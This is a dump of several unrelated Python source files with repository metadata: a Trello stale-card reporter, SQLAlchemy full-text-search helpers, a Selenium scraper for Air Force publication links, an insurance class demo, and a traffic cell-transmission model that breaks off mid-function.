'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Reggae.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_RnB.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Rock.id', # 13
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_World.id',
'/home/ftamagnan/dataset/id_lists/tagtraum/tagtraum_Unknown.id'
]
PATH_TAGS_ROCK = [
'/home/ftamagna/Documents/_AcademiaSinica/code/LabelDrumFills/id_lists/tagtraum/tagtraum_Rock.id',
]
import os
from random import randint
def tensor_to_numpy(array):
    """Convert a torch tensor to a numpy array.

    Uses detach() before cpu()/numpy(): the legacy ``.data`` attribute is
    discouraged in modern PyTorch, and detach() converts grad-requiring
    tensors cleanly with the same result.
    """
    return array.detach().cpu().numpy()
def random_file(filepath_dataset=PATH,path_tags=PATH_TAGS_ROCK):
    """Pick a random (directory, filename) pair from the LPD-5 dataset.

    Walks each tag id-list in *path_tags*, resolves every track id to its
    nested dataset directory, collects all entries that are neither label
    nor metrics files, and returns one of them at random.
    """
    candidates = []
    # ITERATE OVER THE TAG LISTS
    for tag in path_tags:
        print('>>' + tag[29:-3])  # assumes tag paths share a fixed prefix/suffix — TODO confirm
        with open(tag, 'r') as f:
            # ITERATE OVER THE FOLDER LISTS
            for file in f:
                file = file.rstrip()
                # Track ids map to a three-level nested directory (chars 2..4).
                middle = '/'.join(file[2:5]) + '/'
                p = filepath_dataset + middle + file
                for npz in os.listdir(p):
                    if 'label' not in npz and 'metrics' not in npz:
                        candidates.append((p + '/', npz))
    # BUG FIX: randint is inclusive on both ends, so the original
    # randint(0, len(all)) could index one past the end of the list.
    pick = candidates[randint(0, len(candidates) - 1)]
    return pick
| [
"frederic.tamagnan@gmail.com"
] | frederic.tamagnan@gmail.com |
096bc0ec339e35fa0708f8f760dd66381cdcf5eb | bd64c5926f5a6d17f823d48eb27070a9e4c93e49 | /main.py | f3bd374d376d3a9bb7954013e34465e803abb3d2 | [
"MIT"
] | permissive | ahamlinman/trello-reporter | 9768ef58ea6215f8e59ce38e4f40e751dee7e013 | 601e7f74592f89a6424bf20a38b63153f80091e1 | refs/heads/master | 2021-08-08T01:57:59.260557 | 2020-08-23T04:35:25 | 2020-08-23T04:38:36 | 214,364,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,073 | py | #!/usr/bin/env python3
from datetime import datetime, timedelta
from pprint import pprint
import argparse
import json
import os
from dateutil.parser import parse as parse_date
from mailer import send_email
from reporter import Reporter
from trello import TrelloClient
def older_than(date_str, delta_spec):
    """True when the timestamp in *date_str* is older than timedelta(**delta_spec)."""
    moment = parse_date(date_str)
    age = datetime.now(tz=moment.tzinfo) - moment
    return age > timedelta(**delta_spec)
def build_report(config, trello):
    """Build the stale-card report text, or None when nothing is stale."""
    reporter = Reporter()
    for spec in config["lists"]:
        board_list = trello.list(spec["listId"])
        stale = [
            c
            for c in board_list["cards"]
            if older_than(c["dateLastActivity"], spec["timeDelta"])
        ]
        if stale:
            reporter.add_section(board_list["name"], [c["name"] for c in stale])
    # No sections means nothing aged past its threshold.
    if not reporter.sections:
        return None
    return reporter.format(config["heading"])
def run_report(config, email=False):
    """Build the report and either e-mail it or print it to stdout.

    Requires TRELLO_KEY / TRELLO_TOKEN in the environment.
    """
    trello = TrelloClient(os.getenv("TRELLO_KEY"), os.getenv("TRELLO_TOKEN"))
    report_text = build_report(config, trello)
    if report_text is None:
        print("(nothing to report)")
        return
    if email:
        result = send_email(config["emailAddress"], config["subject"], report_text)
        pprint(result)
    else:
        print(report_text)
def lambda_handler(event, _context):
    """AWS Lambda entry point: the event payload is the report config."""
    run_report(event, True)
def main():
    """CLI entry point: parse flags, load the JSON config, run the report."""
    parser = argparse.ArgumentParser(description="Report on old Trello cards.")
    parser.add_argument(
        "--config",
        type=str,
        default="config.json",
        metavar="FILE",
        help="path to the JSON config file " "(default: config.json)",
    )
    parser.add_argument(
        "--email",
        action="store_true",
        help="send an email instead of printing the report",
    )
    args = parser.parse_args()
    with open(args.config, "r") as config_file:
        config = json.load(config_file)
    run_report(config, args.email)
if __name__ == "__main__":
    main()
| [
"alex@alexhamlin.co"
] | alex@alexhamlin.co |
b080960023d3de4b6813fe57e3f48af239f29069 | 836fcb1fb4db3d2b6d0d9b54c3f916bc599a0b62 | /ClassInterface2.py | 3842cd4a687fcb9ac5f6b695d29199ec4b6d536c | [] | no_license | opickers90/Python3-1 | cf8c544ee17107f535e4431fbe67eb4e218fff70 | 04b2338ddfb7c554cc123677a769b2f4dafbdc5b | refs/heads/master | 2020-04-19T11:01:35.793376 | 2019-02-02T11:11:04 | 2019-02-02T11:11:04 | 168,155,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | class InsurancePolicy:
    def __init__(self, price_of_item):
        # Remember the insured item's price; subclasses derive rates from it.
        self.price_of_insured_item = price_of_item
class VehicleInsurance(InsurancePolicy):
    """Vehicle policy: the rate is 0.1% of the insured item's price."""
    def get_rate(self):
        rate_factor = .001
        return self.price_of_insured_item * rate_factor
class HomeInsurance(InsurancePolicy):
    """Home policy: the rate is 0.005% of the insured item's price."""
    def get_rate(self):
        rate_factor = .00005
        return self.price_of_insured_item * rate_factor
# Demo: two $2000 policies; print each policy's computed rate.
vehicle = VehicleInsurance(2000)
home = HomeInsurance(2000)
def InsuranceTotal(vehicle_or_home):
    # Polymorphic call: each subclass supplies its own get_rate().
    print(vehicle_or_home.get_rate())
for insurance in [vehicle, home]:
    InsuranceTotal(insurance)
| [
"taufik@LI-320s"
] | taufik@LI-320s |
a65776b895a6918affe05ddf0fd3dea283e97182 | 52a7fd3ef46cb0a29b42ab11386721ece0f51a56 | /env/lib/python2.7/site-packages/sqlalchemy_utils/expressions.py | 150c6fa6e53759ac18827ad54c0720835a405707 | [] | no_license | nicolas3355/AUBOOST | 95f8b2c0503fd1dfecdbceb9f1a0e88b786a3b4b | 6af5593ef85c675336850e7e1691cb267cb26315 | refs/heads/master | 2016-08-04T03:28:12.180742 | 2015-06-29T17:41:53 | 2015-06-29T17:41:53 | 38,261,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | import sqlalchemy as sa
from sqlalchemy.sql import expression
from sqlalchemy.ext.compiler import compiles
from sqlalchemy_utils.types import TSVectorType
class tsvector_match(expression.FunctionElement):
type = sa.types.Unicode()
name = 'tsvector_match'
@compiles(tsvector_match)
def compile_tsvector_match(element, compiler, **kw):
args = list(element.clauses)
if len(args) < 2:
raise Exception(
"Function 'tsvector_match' expects atleast two arguments."
)
return '(%s) @@ %s' % (
compiler.process(args[0]),
compiler.process(args[1])
)
class to_tsquery(expression.FunctionElement):
type = sa.types.Unicode()
name = 'to_tsquery'
@compiles(to_tsquery)
def compile_to_tsquery(element, compiler, **kw):
if len(element.clauses) < 1:
raise Exception(
"Function 'to_tsquery' expects atleast one argument."
)
return 'to_tsquery(%s)' % (
', '.join(map(compiler.process, element.clauses))
)
class plainto_tsquery(expression.FunctionElement):
type = sa.types.Unicode()
name = 'plainto_tsquery'
@compiles(plainto_tsquery)
def compile_plainto_tsquery(element, compiler, **kw):
if len(element.clauses) < 1:
raise Exception(
"Function 'plainto_tsquery' expects atleast one argument."
)
return 'plainto_tsquery(%s)' % (
', '.join(map(compiler.process, element.clauses))
)
class tsvector_concat(expression.FunctionElement):
type = TSVectorType()
name = 'tsvector_concat'
@compiles(tsvector_concat)
def compile_tsvector_concat(element, compiler, **kw):
return ' || '.join(map(compiler.process, element.clauses))
class array_get(expression.FunctionElement):
name = 'array_get'
@compiles(array_get)
def compile_array_get(element, compiler, **kw):
args = list(element.clauses)
if len(args) != 2:
raise Exception(
"Function 'array_get' expects two arguments (%d given)." %
len(args)
)
if not hasattr(args[1], 'value') or not isinstance(args[1].value, int):
raise Exception(
"Second argument should be an integer."
)
return '(%s)[%s]' % (
compiler.process(args[0]),
sa.text(str(args[1].value + 1))
)
| [
"nicolaselhaddad.nh@gmail.com"
] | nicolaselhaddad.nh@gmail.com |
996050481c43d0fc4419ad5c97ca943a18676fea | 08bb966a6eb75877429630787a7adcb090685cb9 | /web_scraping/link_scrapers/link_scraper_majcom.py | 8ef4bbd895461f08cedc85db64b0f8e976a6fd4e | [
"MIT"
] | permissive | RANDCorporation/policy2vec | 946dd6743b22bafa31926400695b5485136fe9b5 | a309217115b2163241313a239671b2ab84169b3e | refs/heads/master | 2023-04-09T11:10:46.303654 | 2021-04-20T23:41:11 | 2021-04-20T23:41:11 | 359,979,373 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,055 | py | # Network Analysis of Vaccination Strategies
# Copyright (C) 2020 by The RAND Corporation
# See LICENSE and README.md for information on usage and licensing
## Imports
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from time import sleep
import pandas as pd
#import tabula
import time
import os
import pynput
from pynput.keyboard import Key, Controller
import re
import math
import datetime
## Set-up
parent_url = "https://www.e-publishing.af.mil/Product-Index/"
options = webdriver.ChromeOptions()
profile = {"plugins.plugins_list": [{"enabled": False, "name": "Chrome PDF Viewer"}], "download.extensions_to_open": ""}
#option.add_argument(“ -- incognito”)
## set-up the chrome driver
from os.path import dirname, abspath
chromedriver_path = dirname(dirname(abspath(__file__))) + '/chromedriver'
driver = webdriver.Chrome(executable_path=chromedriver_path, options=options)
driver.get(parent_url)
keyboard = Controller()
## Get the AF MAJCOM-Level pubs
#MAJCOM
get_internet = driver.find_element_by_xpath('//*[@id="mvcContainer-449"]/div[2]/div[1]/div[1]/ul/li[4]/a')
get_internet.click()
time.sleep(3)
top_level_url = driver.current_url
print(top_level_url)
## scan through the different MAJCOMs
hrefs = []
titles = []
for m in range(1,11):
## navigate to the top-level page
driver.get(top_level_url)
## select the MAJCOM
get_internet = driver.find_element_by_xpath('//*[@id="cat-2"]/div/ul/li[' + str(m) + ']/a')
print('navigating to: ' + get_internet.text)
get_internet.click()
time.sleep(3)
## select All-Pubs
get_internet = driver.find_element_by_xpath('//*[@id="org-list"]/div[1]/ul/li[1]/a')
get_internet.click()
time.sleep(3)
## find out how many pages there are
s = driver.find_element_by_xpath('//*[@id="data_info"]').text
s = s[s.index('of'):]
num_docs = int(re.sub("[^0-9]", "", s))
num_pages = math.ceil(num_docs/10)
## scan through multiple pages (each of which shows 10 items)
print('scanning through %i pages' %num_pages)
count = 0
for j in range(1,num_pages+1):
## click on the appropriate page number
if j <= 4:
k = j
if j == 5:
k = 5
elif num_pages > 5 and 5 < j and j < num_pages-1:
k = 4
elif num_pages > 5 and j == num_pages-1:
k = 5
elif num_pages > 5 and j == num_pages:
k = 6
get_internet = driver.find_element_by_xpath('//*[@id="data_paginate"]/span/a[' + str(k) + ']')
get_internet.click()
## scan through a single page
for i in range(1,11):
## try/except since the last page will have less than 10 items
try:
element = driver.find_element_by_xpath('//*[@id="data"]/tbody/tr[' + str(i) + ']/td[1]/a')
title_xpath = '//*[@id="data"]/tbody/tr[' + str(i) + ']/td[2]'
titles.append(driver.find_element_by_xpath(title_xpath).text)
hrefs.append(element.get_attribute('href'))
count += 1
except:
pass
print('page: %i, links:%i ' %(j, count))
## Save the links and document titles as a csv file
import pandas as pd
if not os.path.exists('logs'):
os.makedirs('logs')
source_link = [parent_url]*len(hrefs)
source = ['Air Force E-Publishing']*len(hrefs)
date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
link_date = [date]*len(hrefs)
df = pd.DataFrame({'Title':titles, 'source':source, 'source link':source_link, 'link':hrefs, 'link date':link_date})
df.to_csv('logs/AF_epubs_majcom.csv', index=False)
### Save the links
#with open('links/AF_epubs_majcom.txt', 'w') as f:
# for item in hrefs:
# f.write("%s\n" % item)
## close the session
driver.quit()
| [
"gshartnett@gmail.com"
] | gshartnett@gmail.com |
222c5178a7adba45b63bfa89f62fe5db08357f6f | 31a49331912b64586e4c811403d335d054ad0172 | /cardcalc/__init__.py | 44e34496838c665917e2a4dbfd607e95b2c0266c | [] | no_license | kuwoyuki/kadocalc | 1645827ec385f8d2c5744f5092c38328ad20e10d | cf2e4a8f6d5937c1210b854642eec0f3ac38343b | refs/heads/master | 2022-12-27T11:15:29.924433 | 2020-10-15T16:33:36 | 2020-10-15T16:33:36 | 298,285,986 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | from .core import app
def main():
app() | [
"kuwoyuki@gmail.com"
] | kuwoyuki@gmail.com |
a84953050ba040b805bbbeb0174345a641f84c25 | d48b46f53cb1b54899e6f84863c5f275d17b0f0d | /lab_09/utils.py | aa6240241cbc03d043995fa83a36a0d0f79a1b72 | [] | no_license | ivaaahn/bmstu-cg | 36c26768aa398a56dd3661ef5f067be90a7abcd5 | 9cb70730d9c4f0e4ad172ff5018bed7ae6ccbd2d | refs/heads/main | 2023-06-11T23:15:33.751793 | 2021-06-22T20:23:24 | 2021-06-22T20:23:24 | 343,135,970 | 1 | 0 | null | 2021-03-13T13:17:32 | 2021-02-28T15:16:13 | Python | UTF-8 | Python | false | false | 105 | py | W, H = 1236, 941
def custom_round(num: float) -> int:
return int(num + (0.5 if num > 0 else -0.5))
| [
"ivahnencko01@gmail.com"
] | ivahnencko01@gmail.com |
e9327ec7e2122b53dc3b6ba3560a822de0e43c08 | 740b4f75dbede3c7d81e2fbd55e81ae62fe88589 | /Mutuales/models.py | 8c847d0be6b02ac64179b7764475e59861de8415 | [] | no_license | juancastelli1/FederacionMut | e45ced865ab3082ceacb678458b7390c9502be54 | 48ec18b4ce92d39306b77b51e10c26e6991d314d | refs/heads/master | 2023-08-17T12:41:48.248851 | 2021-09-29T19:03:40 | 2021-09-29T19:03:40 | 411,431,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | from django.db import models
from django.db.models.fields import AutoField
from backend.deptos import deptos_tucuman
# Create your models here.
"""
Construyo la entidad para los servicios
"""
class servicios(models.Model):
id_servicio=models.AutoField(primary_key=True)
servicio=models.CharField(max_length=20)
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now_add=True)
class Meta:
db_table='servicios'
verbose_name='servicio'
verbose_name_plural='servicios'
ordering=['servicio']
def __str__(self):
cadena = str(self.id_servicio) + ' - ' + str(self.servicio)
return cadena
"""
Construyo la entidad para las omutuales
"""
class mutuales(models.Model):
id_mutual=models.AutoField(primary_key=True)
nombre=models.CharField(max_length=100)
sucursal=models.CharField(max_length=30, choices=deptos_tucuman)
##id_servicio=models.ForeignKey(servicios, on_delete=models.CASCADE)
created=models.DateTimeField(auto_now_add=True)
updated=models.DateTimeField(auto_now_add=True)
class Meta:
db_table='mutuales'
verbose_name='mutual'
verbose_name_plural='mutuales'
ordering=['id_mutual']
def __str__(self):
cadena = str(self.id_mutual) + ' - ' + str(self.nombre) + ' - ' + str(self.sucursal)
return cadena
class servicio_mutual(models.Model):
id_serv_mut = AutoField(primary_key=True)
id_mutual=models.ForeignKey(mutuales, on_delete=models.CASCADE)
id_servicio=models.ForeignKey(servicios, on_delete=models.CASCADE)
class Meta:
db_table='servicio_mutuales'
verbose_name='servicio_mutual'
verbose_name_plural='servicios_mutual'
ordering=['id_mutual']
unique_together = ('id_mutual', 'id_servicio',)
| [
"juancastelli12345@gmail.com"
] | juancastelli12345@gmail.com |
4f11e5a9b9a6bb26ab4f1092072e1ee5fbba1ab3 | 6407cca09a68be7ff28ad8ce31fa43af5d099eb3 | /oldbkp_mao_data/TrafficModels.py | ed28f706a7aa1debf781fa3b45465c1b133c7a7a | [] | no_license | hannnni/lkw_algo | 34936fdda7b6e10112845358ea03a6a17ecf1389 | f6cbd5a14cafe0203097499fd3b836a8cf326c42 | refs/heads/master | 2021-01-18T14:11:10.944867 | 2014-11-11T22:21:58 | 2014-11-11T22:21:58 | 26,492,296 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39,002 | py |
import os
import string
import random
import csv
import numpy# as np
import scipy
import pygame
import math
global NetworkFileName
#, signalPlanFileName
#filename = 'networkTest.csv'
NetworkFileName = 'NetworkTestFeld.csv'
#signalPlanFileName = 'temporarySp.csv'
"""
Should predefine link Number or should be read from the excle sheet?
"""
global NumberOfLinks
NumberOfLinks = 158#or can be readed from excel tables????, wenn constant , then need to be checked!!!
global simulationCycle, cycleTime, simulationTime
simulationCycle = 3
cycleTime = 70
simulationTime = simulationCycle*cycleTime
#have to be the same as in test.py, or should all passed from there....
class linkInfor:
def __init__(self):
self.linkID = []
self.linkLength = []
self.linkCapacity = []
self.isTurning = []
self.isInLink = []
self.isOutLink = []
self.isSignalized = []
self.mergeFrom = []
self.divergeTo = []
self.extraDivergeTo = []
#just in case that all the variables dont get the initial empty value!!!!
def init_Link(self):
self.linkID = []
self.linkLength = []
self.linkCapacity = []
self.isTurning = []
self.isInLink = []
self.isOutLink = []
self.isSignalized = []
self.mergeFrom = []
self.divergeTo = []
self.extraDivergeTo = []
class CellTransmissionModel:
def __init__(self):
self.linkIDs = []
self.linkCapacitys = []
self.linkMaxFlows = []
self.currentStatuses = []
self.previousStatuses = []
self.currentFlows = []
self.previousFlows = []
#maybe not need if a list of sublist is used
#self.linkIndexForStatus = []
#self.linkIndexForFlow = []
#ID Index:
self.mergeFromIds = []
self.divergeToIds = []
self.extraDivergeToIds =[]
self.mergeFromIdsList = []
self.divergeToIdsList = []
self.extraDivergeToIdsList =[]
#IX Index:
self.mergeFromIxs = []
self.divergeToIxs = []
self.extraDivergeToIxs =[]
self.mergeFromIxsList = []
self.divergeToIxsList = []
self.extraDivergeToIxsList =[]
self.isTurning = []
self.isInLink = []
self.isOutLink = []
self.isSignalized = []
self.turningRatiosDiverge = []
self.turningRatiosExtraDiverge = []
self.signalPlans = []
self.networkLinks =[]
# variable for evaluation:
self.waitingTime = 0
self.overallWaitingTime = 0
def readNetwork(self):
with open(NetworkFileName, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')
self.networkLinks = range(NumberOfLinks)
for Ix in range(NumberOfLinks):
self.networkLinks[Ix] = linkInfor()
i = 0
for row in spamreader:
rowlist = row[0].split(';')
self.networkLinks[i].init_Link()
self.networkLinks[i].linkID = int(rowlist[0])
#print self.networkLinks[i].linkID
self.networkLinks[i].linkLength = int(rowlist[1])
#print self.networkLinks[i].linkLength
self.networkLinks[i].linkCapacity = int(rowlist[2])
#print 'No.of Link ' ,i
#print self.networkLinks[i].linkCapacity
self.networkLinks[i].isTurning = int(rowlist[3])
#print self.networkLinks[i].isTurning
self.networkLinks[i].isInLink = int(rowlist[4])
#print self.networkLinks[i].isInLink
self.networkLinks[i].isOutLink = int(rowlist[5])
#print self.networkLinks[i].isOutLink
self.networkLinks[i].isSignalized = int(rowlist[6])
#print self.networkLinks[i].isSignalized
mergeFromList = rowlist[7].split('|')
#print mergeFromList
self.networkLinks[i].mergeFrom = []
#print len(mergeFromList)
if mergeFromList[0]!= '':
for mergeLink in mergeFromList:
self.networkLinks[i].mergeFrom.append(int(mergeLink))
#print self.networkLinks[i].mergeFrom
divergeToList = rowlist[8].split('|')
self.networkLinks[i].divergeTo=[]
if divergeToList[0]!= '':
for divergeLink in divergeToList:
self.networkLinks[i].divergeTo.append(int(divergeLink))
#print 'self.networkLinks[i].divergeTo',self.networkLinks[i].divergeTo
extraDivergeToList = rowlist[9].split('|')
self.networkLinks[i].extraDivergeTo = []
if extraDivergeToList[0]!= '':
for exstraDivergeLink in extraDivergeToList:
self.networkLinks[i].extraDivergeTo.append(int(exstraDivergeLink))
#print self.networkLinks[i].extraDivergeTo
#
i = i+1
#print 'the No. of the link ',i
#return self.networkLinks # x, y = return(a, b), return more than 1 values
# temparary fix time plan, should be get this from GA
def readSignalPlans(self):
with open(signalPlanFileName, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')
self.signalPlans = [0]*len(self.extraDivergeToIds)
for l in range(len(self.signalPlans)):
self.signalPlans[l] = []
i = 0
for row in spamreader:
rowlist = row[0].split(';')
for j in range(len(rowlist)):
self.signalPlans[j].append(int(rowlist[j]))
i=i+1
#print 'self.signalPlans', self.signalPlans
def buildCTM(self):
networkForCTM = self.networkLinks
#i = 0
for networkLink in networkForCTM:
self.linkIDs.append(networkLink.linkID)
#print i
#i = i +1
#print networkLink.linkCapacity
self.linkCapacitys.append((networkLink.linkCapacity)*1.6)
self.linkMaxFlows.append((networkLink.linkCapacity)*0.5)
self.isTurning.append(networkLink.isTurning)
self.isInLink.append(networkLink.isInLink)
self.isOutLink.append(networkLink.isOutLink)
self.isSignalized.append(networkLink.isSignalized)
if networkLink.linkID >= 500:
travelSpeed = 5 #speed at turning links
else:
travelSpeed = 12.5 # speed at normal links
travelTime = round(networkLink.linkLength/travelSpeed)
cellNumber = int(travelTime + 2) #include 2 vitual cells
#self.linkIndexForStatus.append(overallLengthStatus)
#overallLengthStatus = cellNumber + overallLengthStatus
currentLinkStatus = []
for cell in range(0,cellNumber):
currentLinkStatus.append(0.0)
self.currentStatuses.append(currentLinkStatus)
#self.linkIndexForFlow.append(overallLengthFlow)
#overallLengthFlow = cellNumber + overallLengthFlow - 1
currentLinkFlow = []
for FlowNumber in range(0,cellNumber-1):
currentLinkFlow.append(0.0)
self.currentFlows.append(currentLinkFlow)
#need Ixs instead of IDs
if len(networkLink.mergeFrom) != 0:
self.mergeFromIds.append(networkLink.linkID)
self.mergeFromIdsList.append(networkLink.mergeFrom)
if len(networkLink.divergeTo) != 0:
self.divergeToIds.append(networkLink.linkID)
self.divergeToIdsList.append(networkLink.divergeTo)
#temporary calculation of turning ratia, should be readed from the file
turningRatioDiverge = []
NumberOfDivergeLinks = len(networkLink.divergeTo)
turningRatioDiverge = [1/float(NumberOfDivergeLinks) for linksnumber in range(NumberOfDivergeLinks)]
self.turningRatiosDiverge.append(turningRatioDiverge)
if len(networkLink.extraDivergeTo) != 0:
self.extraDivergeToIds.append(networkLink.linkID)
self.extraDivergeToIdsList.append(networkLink.extraDivergeTo)
#temporary calculation of turning ratia, should be readed from the file
turningRatioExtraDiverge = []
NumberOfExtraDivergeLinks = len(networkLink.extraDivergeTo)
turningRatioExtraDiverge = [1/float(NumberOfExtraDivergeLinks) for linksnumber in range(NumberOfExtraDivergeLinks)]
self.turningRatiosExtraDiverge.append(turningRatioExtraDiverge)
self.previousStatuses = self.currentStatuses
self.previousFlows = self.currentFlows
#convert link id to link ix in oder to find links easily!!!!
for ml in range(len(self.mergeFromIds)):
linkIx = self.linkIDs.index(self.mergeFromIds[ml])
self.mergeFromIxs.append(linkIx)
MIdsTemp = self.mergeFromIdsList[ml]
MIxTemp = [0]*len(self.mergeFromIdsList[ml])
for mln in range(len(MIxTemp)):
MIxTemp[mln] = self.linkIDs.index(MIdsTemp[mln])
self.mergeFromIxsList.append(MIxTemp)
for dl in range(len(self.divergeToIds)):
linkIx = self.linkIDs.index(self.divergeToIds[dl])
self.divergeToIxs.append(linkIx)
DIdsTemp = self.divergeToIdsList[dl]
DIxTemp = [0]*len(self.divergeToIdsList[dl])
for dln in range(len(DIxTemp)):
DIxTemp[dln] = self.linkIDs.index(DIdsTemp[dln])
self.divergeToIxsList.append(DIxTemp)
#print 'self.divergeToIxsList:', self.divergeToIxsList
for el in range(len(self.extraDivergeToIds)):
linkIx = self.linkIDs.index(self.extraDivergeToIds[el])
self.extraDivergeToIxs.append(linkIx)
EIdsTemp = self.extraDivergeToIdsList[el]
EIxTemp = [0]*len(self.extraDivergeToIdsList[el])
for eln in range(len(EIxTemp)):
EIxTemp[eln] = self.linkIDs.index(EIdsTemp[eln])
self.extraDivergeToIxsList.append(EIxTemp)
def initFlow(self,vehcleInputs):
j = 0
#print 'vehcleInputs',vehcleInputs
for i in range(len(self.isInLink)):
if self.isInLink[i] == 1:
self.previousStatuses[i][1] = round(float(vehcleInputs[j])/float(cycleTime),3)
#print 'self.previousStatuses[1][1] during',self.previousStatuses[1][1]
j = j+1
#print 'vehcleInputs[1]',vehcleInputs[1]
#print 'initFlow self.previousStatuses[5]',self.previousStatuses[5]
# assume evrery inlink get 0.1 flow every second
#need to be assigned according to the detector data for all the inlinks
def initFlow_0(self,vehcleInputs):
j = 0
for i in range(len(self.isInLink)):
if self.isInLink[i] == 1:
#print 'vehcleInputs[j]',vehcleInputs[j]
for k in range(1,len(self.previousStatuses[i])-1):
self.previousStatuses[i][k] = round(float(vehcleInputs[j])/float(cycleTime),3)
#print 'self.currentStatuses[i][1]',self.currentStatuses[i][1]
j = j+1
# assume evrery inlink get 0.1 flow every second
#need to be assigned according to the detector data for all the inlinks
def flowModel(self):
#new empty list for currenflow and status, think about it, which model will be calculated at the very beginning , initialize should be there
currentStatuses = [0]*len(self.currentStatuses)
currentFlows = [0]*len(self.currentFlows)
for nl in range(len(self.currentStatuses)):
currentStatuses[nl] = [0.0]*len(self.currentStatuses[nl])
currentFlows[nl] = [0.0]*len(self.currentFlows[nl])
previousStatuses = self.previousStatuses[:]
previousFlows = self.previousFlows[:]
self.previousFlows = self.currentFlows[:]
self.previousStatuses = self.currentStatuses[:]
linkCapacitys = self.linkCapacitys
linkMaxFlows = self.linkMaxFlows
#check the linkIndexForStatus ?= linkIndexForFlow
for l in range(len(self.currentStatuses)):
capacity = linkCapacitys[l]
maxFlow = linkMaxFlows[l]
previousStatus = previousStatuses[l]
previousFlow = previousFlows[l]
cellNumber = len(currentStatuses[l])
#calculate flows
for c in range(cellNumber-1):
if previousStatus[c]>maxFlow:
sigma = 0.45 # proprotion between backwavespeed and freeflow speed
else:
sigma = 1.0
currentFlows[l][c] = \
round(min(previousStatus[c], maxFlow, \
sigma*(capacity-previousStatus[c+1])),3)
#update
for c2 in range(1,cellNumber-1):
currentStatuses[l][c2] = \
round(previousStatus[c2] + \
currentFlows[l][c2-1] - currentFlows[l][c2],3)
self.currentStatuses = currentStatuses
self.currentFlows = currentFlows
def waitingTimeEvaluation(self):
currentFlows = self.currentFlows
priviousStatuses = self.previousStatuses
self.waitingTime = 0
for i in range(len(currentFlows)):
currentFlow = currentFlows[i]
priviousStatus = priviousStatuses[i]
for j in range(len(currentFlow)):
self.waitingTime = self.waitingTime + abs(priviousStatus[j]-currentFlow[j])
self.overallWaitingTime = self.overallWaitingTime + self.waitingTime
#print 'Waiting time:',self.waitingTime
def mergeModel(self):
#currentStatuses = self.currentStatuses
#currentFlow = self.currentFlow
previousStatuses = self.previousStatuses
#previousFlow = self.previousFlow
linkCapacitys = self.linkCapacitys
linkMaxFlows = self.linkMaxFlows
#linkIndexForStatus = self.linkIndexForStatus
#linkIndexForFlow = self.linkIndexForFlow
linkIDs = self.linkIDs
mergeFromIxs = self.mergeFromIxs
#print 'merge from links: ',mergeFromIxs
mergeFromIxsList = self.mergeFromIxsList
#print 'merge from linkslist: ',mergeFromIxsList
for ml in range(len(mergeFromIxs)):
mergeToLinkIx = mergeFromIxs[ml]
CapacityForMergeTo = linkCapacitys[mergeToLinkIx]
toBeDistributedLinks = mergeFromIxsList[ml][:]
receivingCapacity = CapacityForMergeTo - previousStatuses[mergeToLinkIx][1]
receivingMaxflow = linkMaxFlows[mergeToLinkIx]
restOfReceivingCapacity = max(receivingCapacity,receivingMaxflow)
for step in range(len(mergeFromIxsList)-1):
#Step 1 : calculation of weighting factors for tobedistributed links
weightFactors = []
totalCapacity = 0.0 #float take care 0.0, not 0
for tbl in range(len(toBeDistributedLinks)):
#print 'toBeDistributedLinks is:'
#print toBeDistributedLinks
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
totalCapacity = totalCapacity + linkCapacitys[toBeDistributedLinkIx]
for tbl in range(len(toBeDistributedLinks)):
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
weightFactors.append(linkCapacitys[toBeDistributedLinkIx]/totalCapacity)
#print 'weightfactors: ', weightFactors
#step 2 actually previousToBeDistributedLinks and toBeDistributedLinks are the same, one changes another also!!!!!
#have to use [:], then only get the value of it
previousNoLinks = len(toBeDistributedLinks)
toStayLinks = []
for tbl in range(previousNoLinks):
#print 'tbl', tbl
#print 'length of toBeDistributedLinks', toBeDistributedLinks
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
toBeDistributedVolume = restOfReceivingCapacity * weightFactors[tbl]
#get value from the last second cell
toBesendVolume = previousStatuses[toBeDistributedLinkIx][-2]
#print 'to be send value: ',toBesendVolume
if toBeDistributedVolume >= toBesendVolume:
previousStatuses[toBeDistributedLinkIx][-1] = \
linkCapacitys[toBeDistributedLinkIx] - toBesendVolume
restOfReceivingCapacity = restOfReceivingCapacity - toBesendVolume
#del toBeDistributedLinks[tbl]
#toBedelLinks.append(toBeDistributedLinks[tbl])
#currentNoLinks = len(toBeDistributedLinks)
#print 'build virual cell for merge from links:', currentStatuses[toBeDistributedLinkIx][-1]
else:
toStayLinks.append(toBeDistributedLinks[tbl])
toBeDistributedLinks = toStayLinks
currentNoLinks = len(toBeDistributedLinks)
if currentNoLinks == previousNoLinks:
for tbl in range(len(toBeDistributedLinks)):
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
toBeDistributedVolume = restOfReceivingCapacity * weightFactors[tbl]
previousStatuses[toBeDistributedLinkIx][-1] = \
linkCapacitys[toBeDistributedLinkIx] -toBeDistributedVolume
previousStatuses[mergeToLinkIx][0] = CapacityForMergeTo - previousStatuses[mergeToLinkIx][1]
break
#step 3
#current, previous........take care
#decide the receiving value,
if toBeDistributedLinks ==[]:
for tbl in range(len(mergeFromIxsList[ml])):# this is already changed.....!!!!!
toBeDistributedLinkIx = mergeFromIxsList[ml][tbl]
